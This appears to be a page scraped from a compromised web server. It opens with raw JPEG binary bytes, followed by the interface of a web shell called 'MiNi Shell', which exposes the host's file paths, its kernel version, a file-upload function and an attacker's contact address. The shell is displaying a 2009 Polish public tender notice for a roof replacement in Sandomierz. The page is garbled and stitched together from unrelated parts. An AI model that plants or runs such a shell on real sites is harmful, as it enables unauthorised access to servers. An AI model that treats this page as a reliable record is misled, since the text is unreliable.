JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090708/107813-N-2009.html

<p class="kh_header"><b>Sandomierz: Wymiana pokrycia dachu wraz z robotami towarzyszącymi na budynku mieszkalno - usługowym położonym w Sandomierzu przy ul. Rynek 22</b><br>
<b>Numer ogłoszenia: 107813 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Sandomierz , Plac Poniatowskiego 3, 27-600 Sandomierz, woj. świętokrzyskie, tel. 015 6440100, faks 015 6440100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sandomierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana pokrycia dachu wraz z robotami towarzyszącymi na budynku mieszkalno - usługowym położonym w Sandomierzu przy ul. Rynek 22.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są nw roboty budowlane:
a. roboty rozbiórkowe na dachu :
- rozbiórka pokrycia z dachówki karpiówki podwójnie (elewacja: północna, południowa, wschodnia i zachodnia) - 283.751 m2,
- rozebranie obróbek murów ogniowych, okapów, kołnierzy, gzymsów z blachy nie nadającej się do użytku - 202.730 m2
- rozebranie elementów więźb dachowych- deski okapowe, gzymsowe, wiatrowe - 53.000 m
- rozebranie rynien z blachy nadającej się do użytku z blachy miedzianej do odzysku - 39.620 m,
- rozebranie rynien z blachy ocynkowanej nie nadającej się do użytku - 39.480 m,
- rozbiórka betonowych czapek kominowych - 11.392 m2,
- rozebranie obicia ścian drewnianych z desek nieotynkowanych - 21.600 m2
- transport gruzu z dachówki samochodem samowyładowawczym, przy ręcznym załadowaniu i mechanicznym rozładowaniu (na odległość 10 km) - 17.812 t
b. wykonanie pokrycia dachu:
- wymiana elementów konstrukcyjnych dachu - krokwie zwykłe - 23.200 m,
- rozebranie i ponowne ułożenie łat - 283.764 m2 ,
- wymiana łacenia dachu - kontr łaty dystansowe - 181.453 m2
- pokrycie dachu dachówką karpiówką ceram. w koronkę (dachówki montowane na spinki burzowe, gąsiory na klamry) - 284.000 m2,
- pokrycie dachu dach. karpiówką w koronkę - dachówki wentylacyjne pod kalenicą po obu stronach (60 szt) - 2.808 m2,
- położenie izolacji przeciwwilgociowej połaci dachowej (membraną wysokoparoprzepuszczalną) - 284.000 m2,
- montaż pasów nadrynnowych aluminiowych w kolorze dachówki - 31.040 m,
- montaż siatki ochronnej wentylacyjnej aluminiowej okapu - 31.040 m,
- montaż taśmy wentel. uszczelniającej na daszku od str. wschodniej - 13.600 m,
- osadzenie okien włazowych w dachu typu Fakro - 2 szt,
- obróbki blacharskie z blachy powlekanej - 179.060 m2,
- osadzenie kratek wentylacyjnych w kominach - 86 szt,,
- uzupełnienie tynków zewnętrznych na kominach - 69.836 m2,
- dwukrotne malowanie elewacji kominów farbami emulsyjnymi - 69.900 m2,
- rynny dachowe z blachy stal. powlekanej - 14.000 m,
- rury spustowe z blachy powlekanej - 25.480 m,
- rynny dachowe z blachy z miedzi (z rozbiórki) - 20.120 m,
- rury spustowe z blachy z miedzi (z rozbiórki) - 16.500 m,
- rury spustowe z blachy miedzi (nowe) - 3.000 m,
c. remont instalacji odgromowej + dwukrotne pomiary,
d. wymiana stolarki okiennej i drzwiowej,
e. docieplenie poddasza płytami styropianowymi (10cm) wraz z położeniem warstwy wyrównawczej pod posadzki z zap. cem. - 174.600 m2,
f. malowanie elewacji:
- przygotowanie powierzchni pod malowanie (elewacja zachodnia) - 134.743 m2,
- gruntowanie podłoży (powierzchnie pionowe) - 275.083 m2,
- jednokrotne malowanie podkładem - 275.083 m2
- malowanie tynków zewnętrznych - 275.083 m2
g. rusztowanie zewnętrzne rurowe o wys. do 15 m - 366.444 m2

Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja techniczna stanowiąca załącznik nr 1 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.26.10.00-4, 45.31.23.11-0, 45.42.11.30-4, 45.32.00.00-6, 45.44.21.00-8, 45.26.21.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podst. art. 24 ust.1 i 2 ustawy - prawo zam. publ., spełniają wymogi art. 22 ust.1 oraz wymogi określone w SIWZ, a w szczególności:
- w okresie ostatnich 5-ciu lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy to w tym okresie, wykonali co najmniej 2 potwierdzone referencjami zadania odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia, tj. wymiana pokrycia dachowego dachówką ceramiczną o wartości co najmniej 65. 000,00 zł każda, 
- posiadają co najmniej 2 referencje dot. robót wymienionych jw. potwierdzające, iż zostały one wykonane z należytą starannością, z podaniem ich wartości, daty i miejsca ich wykonania oraz zamawiającego
- dysponują osobami zdolnymi do wykonania zamówienia, które posiadają uprawnienia do kierowania robotami w branży konstrukcyjno-budowlanej, oraz aktualny wpis kierownika robót na listę właściwej izby samorządu zawodowego.
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły - Spełnia bądź nie spełnia.
Nie spełnienie chociażby jednego z warunków spowoduje wykluczenie wykonawcy 
z postępowania oraz uznanie jego oferty za odrzuconą.

Wykonawca udzieli co najmniej 3-letniej gwarancji na wykonany 
przedmiot zamówienia.

Zgodnie z zapisem w § 10 stanowiącej załącznik do SIWZ wzoru umowy -wykonawca w przypadku wygrania przetargu przed zawarciem umowy przedłoży zamawiającemu niżej wymienioną polisę: - polisa ubezpieczeniowa dot. wszystkich ryzyk budowy (CAR) na sumę ubezpieczenia równą wartości zawartej umowy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony formularz ofertowy.
2. Kosztorys ofertowy.
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
4. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, iż wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, iż uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, iż wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, iż uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6. Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres działalności jest krótszy- to w tym okresie odpowiadających swym rodzajem robotom budowlanym stanowiącym przedmiot zamówienia tj. wymiana pokrycia dachowego dachówką ceramiczną, co najmniej 2 o wartości, co najmniej 65 000,00 zł każda 
7. Co najmniej 2 referencje dot. robót wymienionych jw. potwierdzające, iż zostały one wykonane z należytą starannością, z podaniem ich wartości, daty i miejsca wykonania oraz zamawiającego.
8. Kserokopia uprawnień zawodowych kierownika robót w branży konstrukcyjno-budowlanej z aktualnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego.
9. Wykaz kadry przewidzianej do realizacji zamówienia.
10. Ewentualne pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
11. Polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności
12. Oświadczenie wykonawcy, że spełnia warunki określone w art. 22 ust. 1 - ustawy - prawo zam.publ. 
13. Oświadczenie wykonawcy o niewykluczeniu z art. 24 ust. 1 i 2 ustawy - prawo zamówień publicznych.
14. Oświadczenie wykonawcy o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia i przyjęciu jej bez zastrzeżeń- na formularzu oferty. 
15. Oświadczenie o zapoznaniu się z dokumentacją techniczną stanowiącą załącznik nr 1 do SIWZ- na formularzu oferty.
16. Oświadczenie o związaniu ofertą - na formularzu oferty.
17. Oświadczenie o tajności części oferty - na formularzu oferty (w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji).
18. Upoważnienie do podpisania oferty (o ile nie wynika z innych załączonych do oferty dokumentów, lub pełnomocnictwo - w przypadku konsorcjum).
19. Parafowany projekt umowy.

I.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 3, 4 i 5 j. w. /KRS lub wpis do ewidencji działalności gosp., ZUS,US/ - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a/	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b/	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
Dokumenty, o których mowa w pkt. 1 lit. a winny być wystawione nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert.
Dokument, o którym mowa w pkt.1 lit. b winien być wystawiony nie wcześniej niż 
3 miesiące przed upływem terminu składania ofert.
II.	Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt.1 lit. a, b, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Data wystawienia takiego dokumentu winna odpowiadać datom dokumentów wymienionych w pkt.1 jw.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um.sandomierz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sandomierzu Wydział Zamówień Publicznych, Plac Poniatowskiego 3 27-600 Sandomierz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2009 godzina 09:30, miejsce: Biuro Obsługi Interesanta Urzędu Miejskiego w Sandomierzu, Plac Poniatowskiego 3 27-600 Sandomierz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com